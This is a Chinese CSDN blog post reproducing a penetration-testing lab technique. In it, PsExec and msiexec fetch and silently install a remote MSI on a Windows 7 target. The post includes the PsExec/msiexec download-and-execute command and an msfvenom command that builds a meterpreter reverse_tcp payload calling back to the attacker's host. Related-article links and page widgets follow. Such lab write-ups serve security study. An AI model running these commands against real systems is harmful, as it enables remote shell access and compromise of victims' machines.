对亮神基于白名单 PsExec 执行 payload 第十三季复现

最新推荐文章于 2019-05-06 22:17:39 发布
最新推荐文章于 2019-05-06 22:17:39 发布
阅读量344 收藏 1
点赞数
分类专栏: 亮神文章复现 文章标签: msf 白名单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89879771
版权

0x00 PsExec 简介:

微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性

0x01 环境

攻击机 kali 192.168.5.100
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机
在这里插入图片描述
靶机
在这里插入图片描述

PsExec.exe -d -s msiexec.exe /q /i http://192.168.5.100/shellcode.msi

shell弹回
在这里插入图片描述

0x03 shellcode.msi

在这里插入图片描述

msfvenom -a  x86 --platform windows -p  windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f msi > shellcode.msi

启用80监听
在这里插入图片描述

0x04 总结

不过AV。psexec.exe需下载,解压在命令行运行即可,地址
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

0x05 借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/83_基于白名单PsExec执行payload第十三季.html

cxk331
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透沉思录 - 转自亮神
易编橙 · 终身成长社群,相遇已是上上签!
07-16 340
声明:本文内容来自亮神-gitbook-渗透沉思录[还有一文,"渗透测试的本质"] 内容虽不多,但是通读之后受益良多,对自身的思考,学习层面及技术层面的思考,希望大家也能有所得吧。
hnu 暑期实训之回文串
qq_30747875的博客
09-15 257
文章目录题目思路AC代码 题目 思路 回文串首先可以对所给的字符串判断一下看看是不是回文串,如果是就直接输出0;对于不是回文串的,我们先来观察一段回文串 "abcba" 对于给出的串"abc"的话,我们可以先对其逆序得到"cba",然后将它的后i位接进去,就可以发现答案会是2.一定不能正序接入,因为得优先满足回文串的条件:首末位相等。 AC代码 #include <bits/stdc++.h> using namespace std; bool reverse_string(string
对亮基于白名单 Compiler.Exe 执行 Payload 第六复现
cxk
05-03 503
0x00 Compiler.Exe简介 Microsoft.Workflow.Comiler.exe是.NET Framework默认自带的一个实用工具,用户能够以XOML工作流文件的形式提供一个序列化工作流来执行任意未签名的代码。 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 靶机装有数字AV 0x02 复现 A 攻击机配置监听 靶机执行 ...
404
倾旋
01-05 349
layout: error title: 404 Not Found permalink: /404 这里是引用 Error The page you are looking for either doesn’t exist or is not here anymore. Click [here]({{ site.baseurl }}/) to go back to the home p...
第八十四课:基于白名单Forfiles执行payload第十四.docx
09-15
第八十四课:基于白名单Forfiles执行payload第十四.docx
micro8#Gitbook#83_基于白名单PsExec执行payload第十三1
07-25
PsExec简介:微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet
第八十三课:基于白名单PsExec执行payload第十三.docx
09-15
第八十三课:基于白名单PsExec执行payload第十三.docx
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
我们将使用 exploit/windows/smb/psexec 模块作为示例,演示如何自定义 payload 并将其与第三方框架集成,例如 Veil-Evasion。 首先,我们需要了解 exploit/windows/smb/psexec 模块的选项。在 MSF 中,我们可以...
PAExec:远程执行,如PsExec
04-29
PAExec是免费的,可重新分发的开源软件,等效于Microsoft流行的PsExec应用程序: 文献资料 PAExec主页显示所有命令行选项。 执照 基本上,任何人都可以将该软件用于私人,公共或商业用途,包括将其用作分布式商业...
PsExec64.zip
07-04
.提升cmd权限为SYSTEM 在windows服务器中tomcat以SYSTEM权限启动,JDK自带工具(jmap、jstack、...PsExec64.exe /s cmd 如果不成功,则执行下条命令 PsExec64.exe \\127.0.0.1 -u 服务器用户名 -p 服务器密码 /s cmd
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
05-09
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
对亮基于白名单Regsvr32 执行 payload 第九复现
cxk
05-03 570
0x00 Regsvr32简介: Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。但搭配regsvr32.exe使用的 DLL,需要提供 DllRegis...
对亮基于白名单zipfldr.dll执行payload第十八复现
cxk
05-06 298
0x00 zipfldr.dll简介: zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。 0x01 环境 攻击机 kali 192.168.5.102 靶机 win7 192.168.5.101 装有av 0x02复现 攻击机 靶机rundll32.exe zipfldr.dll,RouteTheCall shellcode.exe 弹回 0x03 sh...
PsExec的问题及其解决办法
天元喜羊羊的博客
04-24 2万+
C:\>PsExec.exe \\192.168.1.142 cmd PsExec v1.98 - Execute processes remotely Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com Couldn't access 192.168.1.142: 登录失败: 未知的用户名或
远程执行命令的psexec工具的基本使用——简单、强大
热门推荐
Miss_Easy的专栏
08-19 2万+
关于psexec工具的基本使用——简单、强大 当你工作中需要执行远程命令时,就用到了psexecpsexec使用简单,但是功能却是很强大。下面就来介绍psexec的基本使用方法。 首先下载psexec [ psexec官方下载地址 ] psexec下载完成后,将psexec压缩包解压到你指定的一个路径,比如我将psexec的压缩包解压到d:\psexec 。 然后,我们
渗透测试-基于白名单执行payload--Forfiles
weixin_30555125的博客
05-02 118
0x01 Forfiles简介: Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。 微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=w...
php安全新闻早八点-高级持续渗透-第二关于后门补充一
Micropoor
12-25 2990
文章转载于:https://micropoor.blogspot.hk/2017/12/php_24.html 这次继续围绕第一篇,第一关于后门:https://micropoor.blogspot.hk/2017/12/php.html 做整理与补充。在深入一步细化demo notepad++。 后门是渗透测试的分水岭,它分别体现了攻击者对目标机器的熟知程度,环境,编程语言,了
使用PsExec tool在Session 0 下运行程序
weixin_33701294的博客
01-29 127
在Service程序中使用OutputDebugString输出log信息, 在当前用户直接运行DbgView.exe, log信息是不会输出到DbgView窗口的.原因是Server程序运行在Session 0下,而DbgView运行在Session 1下.log信息不会跨Session 0输出到Session 1. 解决办法就是设法将DbgView也运行在Session 0下. 这可以通过P...
psexec
最新发布
05-29
PsExec是Sysinternals Suite中的一款命令行实用程序,它允许用户在远程计算机上运行命令和进程。通过PsExec,用户可以在远程计算机上运行命令提示符、PowerShell、Windows管理工具、Windows服务等。 以下是使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值